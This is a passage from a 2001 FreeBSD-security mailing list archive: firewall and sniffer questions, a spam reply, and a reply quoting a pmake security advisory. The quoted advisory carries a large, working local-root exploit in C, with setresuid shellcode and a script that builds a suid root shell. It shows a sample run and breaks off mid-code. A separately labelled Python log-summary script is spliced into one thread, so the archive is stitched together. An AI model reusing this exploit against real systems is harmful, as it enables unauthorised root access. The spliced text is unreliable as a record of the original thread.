> Paul
>
> --
> Paul van der Zwan paulz @ trantor.xs4all.nl
> "I think I'll move to theory, everything works in theory..."

--
All this wheeling and dealing around, why, it isn't for money, it's for fun.
Money's just the way we keep score.

From owner-freebsd-security Wed Nov 21 12:14:05 2001
Delivered-To: freebsd-security@freebsd.org
Received: from tomts12-srv.bellnexxia.net (tomts12.bellnexxia.net [209.226.175.56]) by hub.freebsd.org (Postfix) with ESMTP id F290337B418 for ; Wed, 21 Nov 2001 12:13:53 -0800 (PST)
Received: from khan.anarcat.dyndns.org ([65.94.128.110]) by tomts12-srv.bellnexxia.net (InterMail vM.4.01.03.16 201-229-121-116-20010115) with ESMTP id <20011121201353.UPNQ7758.tomts12-srv.bellnexxia.net@khan.anarcat.dyndns.org>; Wed, 21 Nov 2001 15:13:53 -0500
Received: from shall.anarcat.dyndns.org (shall.anarcat.dyndns.org [192.168.0.1]) by khan.anarcat.dyndns.org (Postfix) with ESMTP id 4E4D01A38; Wed, 21 Nov 2001 15:15:03 -0500 (EST)
Received: by shall.anarcat.dyndns.org (Postfix, from userid 1000) id 25A4720ADB; Wed, 21 Nov 2001 15:15:25 -0500 (EST)
Date: Wed, 21 Nov 2001 15:15:25 -0500
From: The Anarcat
To: Eric Anderson
Cc: FreeBSD Security Issues
Subject: Re: fun with pkg_add
Message-ID: <20011121201525.GC69296@shall.anarcat.dyndns.org>
Mail-Followup-To: Eric Anderson , FreeBSD Security Issues
References: <20011121191808.GD44370@shall.anarcat.dyndns.org> <3BFC025D.36710154@centtech.com> <20011121194159.GA69296@shall.anarcat.dyndns.org>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="s9fJI615cBHmzTOP"
Content-Disposition: inline
In-Reply-To: <20011121194159.GA69296@shall.anarcat.dyndns.org>
User-Agent: Mutt/1.3.23.2i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe:
X-Loop: FreeBSD.org

On Wed Nov 21, 2001 at 02:41:59PM -0500, The Anarcat wrote:
>
> I will open a pr about this.

bin/32172: pkg_add creates its temporary directories world writable

A.

From owner-freebsd-security Wed Nov 21 12:48:02 2001
Delivered-To: freebsd-security@freebsd.org
Received: from atkielski.com (atkielski.com [161.58.232.69]) by hub.freebsd.org (Postfix) with ESMTP id 813B637B417 for ; Wed, 21 Nov 2001 12:47:57 -0800 (PST)
Received: from contactdish (ASt-Lambert-101-2-1-14.abo.wanadoo.fr [193.251.59.14]) by atkielski.com (8.11.6) id fALKltH74163; Wed, 21 Nov 2001 21:47:56 +0100 (CET)
Message-ID: <00dc01c172cd$cc535500$0a00000a@atkielski.com>
From: "Anthony Atkielski"
To: "freebsd-security@freebsd.org"
References: <200111211551.KAA17753@spider10.spiderwebhost.net>
Subject: Re: New Dental Practice Philosophy
Date: Wed, 21 Nov 2001 21:47:30 +0100
MIME-Version: 1.0
Content-Type: text/plain; charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe:
X-Loop: FreeBSD.org

I can just imagine the command now:

root# canal -visits 2 -cost 1200 -crown yes

----- Original Message -----
From: "Steven M. Seltzer"
To: "freebsd-security@freebsd.org"
Sent: Wednesday, November 21, 2001 16:51
Subject: New Dental Practice Philosophy

Hi,

I would like to wish you a very Happy Thanksgiving!

We recently created a one page practice philosophy statement that emphasizes teamwork, caring, helping others, and developing your full potential by assuming a more active role in the practice. This philosophy is designed specifically for updating skills in the practice to utilize technology tools that improve productivity and efficiency.

If you would like to receive this philosophy statement with my compliments, please reply to this e-mail with your name, address, and e-mail address where you would like the philosophy sent.

If you prefer not to receive future technology and practice management updates like this one, please reply to this message and type "remove" in the subject line.

Thank you.

Best regards,

Steve Seltzer
www.hitecdentist.com

From owner-freebsd-security Wed Nov 21 12:55:26 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-64-165-226-105.dsl.lsan03.pacbell.net [64.165.226.105]) by hub.freebsd.org (Postfix) with ESMTP id 64C1C37B417 for ; Wed, 21 Nov 2001 12:55:23 -0800 (PST)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 8ED1666B0F; Wed, 21 Nov 2001 12:55:22 -0800 (PST)
Date: Wed, 21 Nov 2001 12:55:22 -0800
From: Kris Kennaway
To: Paul van der Zwan
Cc: security@FreeBSD.ORG
Subject: Re: ipfw and snort
Message-ID: <20011121125522.A17380@xor.obsecurity.org>
References: <200111212002.fALK2vV20500@trantor.xs4all.nl>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="7AUc2qLy4jB3hD7Z"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200111212002.fALK2vV20500@trantor.xs4all.nl>; from paulz@trantor.xs4all.nl on Wed, Nov 21, 2001 at 09:02:57PM +0100
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe:
X-Loop: FreeBSD.org

On Wed, Nov 21, 2001 at 09:02:57PM +0100, Paul van der Zwan wrote:
>
> I would like to run snort on my ppp link to my ISP to see what people are
> trying, but I also have a set of ipfw rules to allow only the traffic I
> want to allow.
> Is there a way to have those rules in place but still have snort see all
> incoming packets including those running into the deny rules ??

Yes, this is how it works always.

Kris

From owner-freebsd-security Wed Nov 21 13:26:25 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtpzilla3.xs4all.nl (smtpzilla3.xs4all.nl [194.109.127.139]) by hub.freebsd.org (Postfix) with ESMTP id EF12937B416 for ; Wed, 21 Nov 2001 13:26:22 -0800 (PST)
Received: from trantor.xs4all.nl (trantor.xs4all.nl [194.109.61.248]) by smtpzilla3.xs4all.nl (8.12.0/8.12.0) with ESMTP id fALLQFhd003105; Wed, 21 Nov 2001 22:26:16 +0100 (CET)
Received: from trantor.xs4all.nl (localhost [127.0.0.1]) by trantor.xs4all.nl (8.11.6/8.9.3) with ESMTP id fALLQE606054; Wed, 21 Nov 2001 22:26:14 +0100 (MET) (envelope-from paulz@trantor.xs4all.nl)
Message-Id: <200111212126.fALLQE606054@trantor.xs4all.nl>
X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4
To: Kris Kennaway
Cc: Paul van der Zwan , security@FreeBSD.ORG, paulz@trantor.xs4all.nl
Subject: Re: ipfw and snort
In-Reply-To: Message from Kris Kennaway of "Wed, 21 Nov 2001 12:55:22 PST." <20011121125522.A17380@xor.obsecurity.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Wed, 21 Nov 2001 22:26:14 +0100
From: Paul van der Zwan
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe:
X-Loop: FreeBSD.org

> On Wed, Nov 21, 2001 at 09:02:57PM +0100, Paul van der Zwan wrote:
> >
> > I would like to run snort on my ppp link to my ISP to see what people are
> > trying, but I also have a set of ipfw rules to allow only the traffic I
> > want to allow.
> > Is there a way to have those rules in place but still have snort see all
> > incoming packets including those running into the deny rules ??
>
> Yes, this is how it works always.

I did some testing using ethereal, and when I try an incoming telnet (which is denied by ipfw) I don't see any packets arriving (or ICMP going).
This makes me suspect that bpf processing takes place after ipfw..

Paul
--
Paul van der Zwan paulz @ trantor.xs4all.nl
"I think I'll move to theory, everything works in theory..."
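An added example, not part of the thread. The ordering Paul is guessing at can be checked directly: on FreeBSD the bpf tap sits in the interface input path, before ip_input() and therefore before the ipfw rule chain, so tcpdump -ni tun0 on the ppp interface shows a denied SYN whether or not ipfw drops it afterwards; if the sniffer shows nothing, the thing to check is which interface it is bound to, not ipfw. Independently of any sniffer, ipfw records what it drops when the deny rules carry the log keyword and net.inet.ip.fw.verbose is set, writing one syslog line per packet (security facility, /var/log/security on 4.x). The script below, which is my code and not from the thread, parses that format and summarises inbound denials by source and by service. The log lines in SAMPLE_LOG are constructed for the example; confirm the pattern against your own log before relying on it.

```python
"""Added example (not code from the thread): summarise ipfw 'deny log' lines.

With 'log' on the deny rules and net.inet.ip.fw.verbose=1, FreeBSD 4.x
writes one syslog line per dropped packet shaped like
    ipfw: <rule> <Action> <proto> <src>[:<sport>] <dst>[:<dport>] <in|out> via <if>
ICMP lines carry type.code after the protocol and no ports.
The lines in SAMPLE_LOG are constructed for this example."""
import re
from collections import Counter

SAMPLE_LOG = """\
Nov 21 21:02:57 trantor /kernel: ipfw: 65000 Deny TCP 10.1.2.3:4321 192.0.2.10:23 in via tun0
Nov 21 21:02:59 trantor /kernel: ipfw: 65000 Deny TCP 10.1.2.3:4322 192.0.2.10:23 in via tun0
Nov 21 21:03:10 trantor /kernel: ipfw: 65000 Deny TCP 10.9.9.9:2048 192.0.2.10:22 in via tun0
Nov 21 21:03:11 trantor /kernel: ipfw: 65000 Deny UDP 10.9.9.9:137 192.0.2.10:137 in via tun0
Nov 21 21:03:12 trantor /kernel: ipfw: 65000 Deny ICMP:8.0 10.9.9.9 192.0.2.10 in via tun0
Nov 21 21:03:30 trantor /kernel: ipfw: 200 Accept TCP 10.1.2.3:4330 192.0.2.10:25 in via tun0
Nov 21 21:03:31 trantor /kernel: ipfw: 1000 Deny TCP 192.0.2.10:1029 10.1.2.3:113 out via tun0
Nov 21 21:03:40 trantor /kernel: ipfw: 65000 Deny TCP 10.1.2.3:4400 192.0.2.10:23 in via tun0
Nov 21 21:04:00 trantor /kernel: some unrelated kernel message
"""

LINE_RE = re.compile(
    r"ipfw: (?P<rule>\d+) (?P<action>\w+) (?P<proto>[\w.:]+) "
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3})(?::(?P<sport>\d+))? "
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3})(?::(?P<dport>\d+))? "
    r"(?P<dir>in|out) via (?P<iface>\S+)"
)


def parse_ipfw_log(text):
    """One dict per ipfw line; lines that do not match the format are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            rec = m.groupdict()
            rec["rule"] = int(rec["rule"])
            records.append(rec)
    return records


def service_key(rec):
    """'tcp/23', 'udp/137', or 'icmp/8.0' (ICMP type.code instead of a port)."""
    proto, _, sub = rec["proto"].partition(":")
    return "%s/%s" % (proto.lower(), rec["dport"] or sub or "-")


def summarize_denied_inbound(records):
    """Inbound packets ipfw dropped, counted by source host and by service."""
    hits = [r for r in records if r["action"] == "Deny" and r["dir"] == "in"]
    return {
        "denied_in": len(hits),
        "by_source": dict(Counter(r["src"] for r in hits)),
        "by_service": dict(Counter(service_key(r) for r in hits)),
    }


if __name__ == "__main__":
    report = summarize_denied_inbound(parse_ipfw_log(SAMPLE_LOG))
    print("inbound packets denied:", report["denied_in"])
    for src, n in sorted(report["by_source"].items(), key=lambda kv: -kv[1]):
        print("  %-15s %d" % (src, n))
    for svc, n in sorted(report["by_service"].items(), key=lambda kv: -kv[1]):
        print("  %-10s %d" % (svc, n))
```

The two views complement each other: the sniffer shows every packet on the wire, including ones ipfw never sees because they are malformed, while the ipfw log ties each drop to the rule number that matched it. Keep net.inet.ip.fw.verbose_limit set on a dial-up box, or a scan will fill the log.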
From owner-freebsd-security Wed Nov 21 13:37:36 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-64-165-226-105.dsl.lsan03.pacbell.net [64.165.226.105]) by hub.freebsd.org (Postfix) with ESMTP id 0458237B405 for ; Wed, 21 Nov 2001 13:37:18 -0800 (PST)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 937A866B0F; Wed, 21 Nov 2001 13:37:17 -0800 (PST)
Date: Wed, 21 Nov 2001 13:37:17 -0800
From: Kris Kennaway
To: Paul van der Zwan
Cc: Kris Kennaway , security@FreeBSD.ORG
Subject: Re: ipfw and snort
Message-ID: <20011121133717.A22787@xor.obsecurity.org>
References: <200111212126.fALLQE606054@trantor.xs4all.nl>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="Q68bSM7Ycu6FN28Q"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200111212126.fALLQE606054@trantor.xs4all.nl>; from paulz@trantor.xs4all.nl on Wed, Nov 21, 2001 at 10:26:14PM +0100
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe:
X-Loop: FreeBSD.org

On Wed, Nov 21, 2001 at 10:26:14PM +0100, Paul van der Zwan wrote:
> > On Wed, Nov 21, 2001 at 09:02:57PM +0100, Paul van der Zwan wrote:
> > >
> > > I would like to run snort on my ppp link to my ISP to see what people are
> > > trying, but I also have a set of ipfw rules to allow only the traffic I
> > > want to allow.
> > > Is there a way to have those rules in place but still have snort see all
> > > incoming packets including those running into the deny rules ??
> >
> > Yes, this is how it works always.
>
> I did some testing using ethereal and when I try an incoming telnet (which
> is denied by ipfw) I don't see any packets arriving ( or ICMP going).
> This makes me suspect that bpf processing takes place after ipfw..

No, it does work. You must have something else wonky going on.

Kris

From owner-freebsd-security Wed Nov 21 20:11:13 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtp1.ihug.co.nz (smtp1.ihug.co.nz [203.109.252.7]) by hub.freebsd.org (Postfix) with ESMTP id 7C5F937B417 for ; Wed, 21 Nov 2001 20:11:06 -0800 (PST)
Received: from geoff (p27-max1.wlg.ihug.co.nz [203.173.230.27]) by smtp1.ihug.co.nz (8.9.3/8.9.3/Debian 8.9.3-21) with SMTP id RAA24081 for ; Thu, 22 Nov 2001 17:10:57 +1300
X-Authentication-Warning: smtp1.ihug.co.nz: Host p27-max1.wlg.ihug.co.nz [203.173.230.27] claimed to be geoff
Message-ID: <020801c1730b$8cd21fe0$41414fcb@lawn>
From: "Geoff Lawn"
To:
Subject: Unknown transient service 1528/tcp
Date: Thu, 22 Nov 2001 17:08:34 +1300
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe:
X-Loop: FreeBSD.org

Hi there,

I regularly do an nmap on our server with the following results...

Port State Service
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
110/tcp open pop-3
443/tcp open https

Recently I noticed the following service appear...
1528/tcp open mciautoreg

I did another nmap a minute later and the service was no longer there.

Does anyone know what this might be?
Have I been hacked??

Thanks,
Geoff

From owner-freebsd-security Wed Nov 21 20:14:44 2001
Delivered-To: freebsd-security@freebsd.org
Received: from hotmail.com (oe66.pav1.hotmail.com [64.4.30.201]) by hub.freebsd.org (Postfix) with ESMTP id E17FE37B416 for ; Wed, 21 Nov 2001 20:14:41 -0800 (PST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Wed, 21 Nov 2001 20:14:41 -0800
X-Originating-IP: [24.114.220.235]
From: "jack xiao"
To:
Subject: isakmpd questions
Date: Wed, 21 Nov 2001 23:16:06 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="----=_NextPart_000_017E_01C172E2.7F020A20"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2615.200
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200
Message-ID:
X-OriginalArrivalTime: 22 Nov 2001 04:14:41.0816 (UTC) FILETIME=[358A9180:01C1730C]
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe:
X-Loop: FreeBSD.org

Hi,

I wonder why I can't use DES for encryption in phase 1 when I use isakmpd to set up an ipsec tunnel. I know this port in FreeBSD was ported from OpenBSD, but I can use DES in phase 1 under OpenBSD. Is there any difference about ipsec in the kernel between these two? Any ideas will be appreciated.

Thanks a lot!

Jack
From owner-freebsd-security Wed Nov 21 20:20:34 2001
Delivered-To: freebsd-security@freebsd.org
Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with ESMTP id 6329037B405 for ; Wed, 21 Nov 2001 20:20:12 -0800 (PST)
Received: (qmail 3327 invoked by uid 1000); 22 Nov 2001 04:20:11 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 22 Nov 2001 04:20:11 -0000
Date: Wed, 21 Nov 2001 22:20:11 -0600 (CST)
From: Mike Silbersack
To:
Subject: Re: Advisory: Berkeley pmake
In-Reply-To: <3BFBC625.371BC65C@starzetz.de>
Message-ID: <20011121221635.C2710-100000@achilles.silby.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe:
X-Loop: FreeBSD.org

FWIW, I decided to look at our (pmake-derived) make. It appears that this bug was fixed in changes made by NetBSD folk which we imported over 5 years ago. That's cool. :)

In any case, since we don't have make setuid, it looks like it was never an issue for us.

Mike "Silby" Silbersack

On Wed, 21 Nov 2001, Paul Starzetz wrote:

> 1. Problem description
> ----------------------
>
> There is a format string bug in the Berkeley's pmake 2.1.33 and below
> (parallel make) package as well as a buffer overflow problem. Pmake is
> suid root on various Linux distributions and uses root privileges for
> binding to low TCP ports. The ordinary format string bug leads to local
> root compromise on all vulnerable machines.
>
>
> 2. Details
> ----------
>
> The vulnerable code can be found in src/job.c at line 720 and looks
> like:
>
>     if (!(job->flags & JOB_SILENT) && !shutUp &&
>         commandShell->hasEchoCtl) {
>         DBPRINTF ("%s\n", commandShell->echoOff);
>         DBPRINTF (commandShell->errCheck, cmd);
>         shutUp = TRUE;
>     }
>
> and in src/str.c line 170:
>
>     register char *tstr;        /* Pointer into tstring */
>     char tstring[512];          /* Temporary storage for the
>                                  * current word */
>
>
> So if the user puts a shell definition into the Makefile, pmake will use
> errCheck for output formatting which is controllable by the user. The
> following Makefile demonstrates the format string problem:
>
> all:
> 	-echo blah
>
> .SHELL : path=/bin/sh echo="" quiet="" hasErrCtl=no check=%x%x%x%x%x
>
> Putting a long line (>512 characters) in place of the '%x' results in
> SIGSEGV and possible overwrite of the return address on the stack (a
> very carefully prepared string is needed).
>
>
> 3. Solution
> -----------
>
> The patch for the format string bug is obvious. Temporary solution is to
> remove the suid bit from the binary.
>
>
> 4. Status
> ---------
>
> Vendors informed in July 2001.
>
>
> 5. Exploit
> ----------
>
> A hole is a hole is a ... only if it is exploitable. The attached C
> source code will brute force the format string and create a suid shell.
> There is nothing special about it - the only hard point is to get the
> write length correctly.
> Successful exploitation looks like:
>
>
> paul@phoenix:~/expl/pmake > ./pm -w+2
>
> *****************************************
> *                                       *
> *       pmake local root exploit        *
> *       by IhaQueR@IRCnet '2001         *
> *                                       *
> *****************************************
>
>
>
> * PHASE 1
>
>         preparing new environment
>         cleaning
>         preparing shell script
>         allocating pipe
>         stdout/in preparation
>         generating Makefile
>         finished setup
>
>
> * PHASE 2
>
>         digging magic string:   0    1    2    3    4    5    6    7
>                                 8    9   10   11   12
>         found mark, parsing output
>         FOUND magic string with pading=0 output length=1446
>
>
> * PHASE 3
>
>         looking for write position:    1 * FOUND *
>         FOUND write position at index=1
>         creating final makefile
>         creating shell in the environment
>
>
> * PHASE 4
>
>         brute force RET:        0xbfff73b0 0xbfff73b4 0xbfff73b8
>                                 0xbfff73bc 0xbfff73c0
>
> Paradox, created suid shell at /home/paul/expl/pmake/sush
>
>
> ----------------------------------- pmexpl.c
> -----------------------------------
>
> /****************************************************************
>  *                                                              *
>  *  Pmake <= 2.1.33 local root exploit                          *
>  *  coded by IhaQueR@IRCnet                                     *
>  *  compile with gcc -pmexpl-c -o pm                            *
>  *  meet me at HAL '2001                                        *
>  *                                                              *
>  ****************************************************************/
>
>
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
>
>
> // some definitions
> #define TARGET "/usr/bin/pmake"
> #define MKFILE "Makefile"
> #define MKMSH "./mkmsh"
> #define TMPLEN 256
> #define USERSTACK 0xc0000000u
> #define NN "\E[m"
> #define GR "\E[32m"
> #define RD "\E[31m"
> #define BL "\E[34m"
> #define BD "\E[1m"
> #define FL "\E[5m"
> #define UL "\E[4m"
>
>
> extern char **environ;
>
> static const char *banner = "\n"
>     BL"*****************************************\n"
>     "*\t\t\t\t\t*\n"
>     "*\tpmake local root exploit\t*\n"
>     "*\tby "FL"IhaQueR@IRCnet"NN BL" '2001\t\t*\n"
>     "*\t\t\t\t\t*\n"
>     "*****************************************\n"
>     "\n"NN;
>
> static const char *usage =
>     "\n"
>     UL"USAGE:"NN " %s\t-w \n"
>     "\t\t-s \n"
>     "\t\t-a 2.1.33>\n"
>     "\t\t-m \n"
>     "\t\t-p <%%g preload>\n"
>     "\n";
>
> static const char *mkfile = "all:\n\t-echo blah\n\n.SHELL : path=/bin/sh echo=\"\" quiet=\"\" hasErrCtl=no check=";
>
> // setresuid(0,0,0) shellcode
> static char hellcode[]= "\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
>     "\xb0\xa4\xcd\x80"
>     "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
>     "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
>     "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff./mkmsh";
>
> // our suid shell maker
> static char mkmsh[] = "#!/bin/bash\n"
>     "cat <<__DUPA__>sush.c\n"
>     "#include \n"
>     "#include \n"
>     "main() {setuid(geteuid()); execl(\"/bin/bash\", \"/bin/bash\", NULL);}\n"
>     "__DUPA__\n"
>     "gcc sush.c -o sush >/dev/null 2>&1\n"
>     "chown 0.0 sush\n"
>     "chmod u+s sush\n";
>
> static char *fromenv[] = { "TERM",
>     "HOME",
>     "PATH"
> };
>
> #define numenv (sizeof(fromenv)/sizeof(char*)+2)
>
> static char *myenv[numenv];
> static char eb[numenv][TMPLEN];
>
> int cn=0;
>
>
> void child_kill(int v)
> {
>     cn--;
> }
>
>
> int do_fork()
> {
>     cn++;
>     return fork();
> }
>
>
> int main(int ac, char** av)
> {
>     int pd[2], fd, mk, i, j, res, pid, cnt, flip, mx, wdel;
>     unsigned *up, pad, wlen, shadr, wadr, len1, old, idx, gprel;
>     unsigned char *ptr;
>     char buf[16384];
>     char buf2[16384];
>     char aaaa[1024*32];
>     char head[64];
>     struct stat sb;
>     fd_set rs;
>
>
>     // setup defaults
>     // shell address is calculated from user stack location and the big nop buffer...should work :-/
>     shadr = USERSTACK - sizeof(aaaa)/2;
>     wadr = 0xbfff73b0;
>     mx = 512;
>     gprel=150;
>     wdel=0;
>
>     setpgrp();
>     setsid();
>
>     printf(banner);
>
>     // parse options
>     if(ac!=1) {
>         res = getopt(ac, av, "hw:s:a:m:p:");
>         while(res!=-1) {
>             switch(res) {
>                 case 'w' :
>                     wdel = atoi(optarg);
>                     break;
>
>                 case 's' :
>                     sscanf(optarg, "%x", &shadr);
>                     break;
>
>                 case 'a' :
>                     sscanf(optarg, "%x", &wadr);
>                     break;
>
>                 case 'm' :
>                     sscanf(optarg, "%d", &mx);
>                     break;
>
>                 case 'p' :
>                     sscanf(optarg, "%d", &gprel);
>                     if(gprel==0)
>                         gprel=1;
>                     break;
>
>                 case 'h' :
>                 default :
>                     printf(usage, av[0]);
>                     exit(0);
>                     break;
>             }
>             res = getopt(ac, av, "hw:s:a:m:p:");
>         }
>     }
>
>
>     // phase 1 : setup
>     printf("\n\n"BD BL"* PHASE 1\n"NN);
>
>     // prepare environ
>     printf("\n\tpreparing new environment");
>     memset(aaaa, 'A', sizeof(aaaa));
>     aaaa[4]='=';
>     up=(unsigned*)(aaaa+5);
>     for(i=0; i
>         up[i]=0x41424344;
>     aaaa[sizeof(aaaa)-1]=0;
>     len1=strlen(aaaa);
>
>     // buffer overflow :-)
>     myenv[0]=aaaa;
>     for(i=1; i
>         myenv[i]=eb[i-1];
>         strcpy(eb[i-1], fromenv[i-1]);
>         if(!strchr(fromenv[i-1], '=')) {
>             strcat(eb[i-1], "=");
>             strcat(eb[i-1], getenv(fromenv[i-1]));
>         }
>     }
>     myenv[numenv-1]=NULL;
>
>     // clean
>     printf("\n\tcleaning");
>     unlink("LOCK.make");
>     unlink("sush");
>     unlink("sush.c");
>     unlink("mkmsh");
>     system("rm -rf /tmp/make* >/dev/null 2>&1");
>
>     // our suid shell
>     printf("\n\tpreparing shell script");
>     mk = open(MKMSH, O_WRONLY|O_CREAT|O_TRUNC, S_IRWXU|S_IXGRP|S_IXOTH);
>     if(mk<0)
>         perror("open"), exit(1);
>     write(mk, mkmsh, strlen(mkmsh));
>     close(mk);
>
>     // comm pipe
>     printf("\n\tallocating pipe");
>     res = pipe(pd);
>     if(res<0)
>         perror("pipe"), exit(2);
>
>     // redirect stdin/out
>     printf("\n\tstdout/in preparation");
>     res = dup2(pd[1], 2);
>     if(res<0)
>         perror("dup2"), exit(3);
>
>     fd = open("/dev/null", O_RDWR);
>     if(fd<0)
>         perror("open"), exit(4);
>
>     // our makefile
>     printf("\n\tgenerating Makefile");
>     mk = open(MKFILE, O_WRONLY|O_CREAT|O_TRUNC, S_IRWXU);
>     if(mk<0)
>         perror("open"), exit(5);
>     write(mk, mkfile, strlen(mkfile));
>     for(i=0; i
>         write(mk, "%g", 2);
>     fsync(mk);
>
>     // child killer
>     printf("\n\tfinished setup");
>     if(signal(SIGCHLD, &child_kill)==SIG_ERR)
>         perror("signal"), exit(6);
>
>
>     // phase 2 : dig format string
>     printf("\n\n\n" BD BL "* PHASE 2\n"NN);
>     printf("\n\tdigging magic string:\t");
>
>     cnt=0;
>     while(1) {
>
>         lseek(mk, -2, SEEK_CUR);
>         write(mk, "%g%x", 4);
>         fsync(mk);
>         usleep(1);
>
>         pid = do_fork();
>
>         // get child output
>         if(pid) {
>             printf("%4d ", cnt);
>             fflush(stdout);
>
>             do {
>                 bzero(buf, sizeof(buf));
>                 res = read(pd[0], buf, sizeof(buf)-1);
>                 if(res > 128) {
>                     break;
>                 }
>             } while(1);
>             kill(SIGTERM, pid);
>             usleep(1);
>             waitpid(pid, NULL, WUNTRACED);
>             bzero(buf2, sizeof(buf2));
>             read(pd[0], buf2, sizeof(buf2)-1);
>             if(waitpid(pid, NULL, WUNTRACED|WNOHANG)>0)
>                 read(pd[0], buf2, sizeof(buf2)-1);
>
>             // look for padding
>             pad=-1;
>             if(strstr(buf, "41424344")) {
>                 pad=0;
>             }
>             else if(strstr(buf, "42434441")) {
>                 pad=1;
>             }
>             else if(strstr(buf, "43444142")) {
>                 pad=2;
>             }
>             else if(strstr(buf, "44414243")) {
>                 pad=3;
>             }
>
>             // if got the mark parse output for final string
>             if(pad!=-1) {
>                 printf("\n\tfound mark, parsing output");
>                 ptr = strtok(buf, "\t\n ");
>                 while(ptr) {
>                     if(strlen(ptr)>64)
>                         break;
>                     ptr = strtok(NULL, "\t\n ");
>                 }
>
>                 // calculate write length -6, -8 hm I'm dunno about the 16?
>                 wlen=strlen(ptr)+wdel-16;
>                 printf("\n\tFOUND magic string with pading=%d output length=%d",
>                        pad, wlen);
>
>
>                 // PHASE 3 : find write pos in aaaa
>                 printf("\n\n\n" BD BL "* PHASE 3\n"NN);
>
>                 printf("\n\tlooking for write position: ");
>
>                 up=(unsigned*)(aaaa+5-pad);
>                 cnt=0;
>
>                 for(i=1; i
>                     old=up[i];
>                     up[i]=0xabcdef67;
>                     printf("%4d ", i);
>                     sprintf(head, "%x", up[i]);
>                     fflush(stdout);
>
>                     if(cn)
>                         read(pd[0], buf2, sizeof(buf2)-1);
>                     pid = do_fork();
>                     if(pid) {
>                         do {
>                             bzero(buf, sizeof(buf));
>                             FD_ZERO(&rs);
>                             FD_SET(pd[0], &rs);
>                             select(pd[0]+1, &rs, NULL, NULL, NULL);
>                             res = read(pd[0], buf, sizeof(buf)-1);
>                             if(res > 128) {
>                                 break;
>                             }
>                         } while(1);
>                         kill(SIGTERM, pid);
>                         usleep(1);
>                         read(pd[0], buf2, sizeof(buf2)-1);
>
>                         // up[i] is now the place for the beginning of our address field
>                         if(strstr(buf, head)) {
>                             printf(" * FOUND *");
>                             fflush(stdout);
>                             up[i]=old;
>                             idx=i;
>                             printf("\n\tFOUND write position at index=%d", i);
>                             up[i]=old;
>                             ptr = strtok(buf, "\t\n ");
>                             while(ptr) {
>                                 if(strlen(ptr)>64)
>                                     break;
>                                 ptr = strtok(NULL, "\t\n ");
>                             }
>
>                             // construct write 'head':
>                             printf("\n\tcreating final makefile");
>                             fflush(stdout);
>                             lseek(mk, -2, SEEK_CUR);
>
>                             ptr = (unsigned char*)&shadr;
>                             for(j=0; j<4; j++) {
>                                 flip = (((int)256) + ((int)ptr[j])) - ((int)(wlen % 256u));
>                                 wlen = wlen + flip;
>                                 sprintf(head+j*8, "%%%04dx%%n", flip);
>                             }
>                             head[32] = 0;
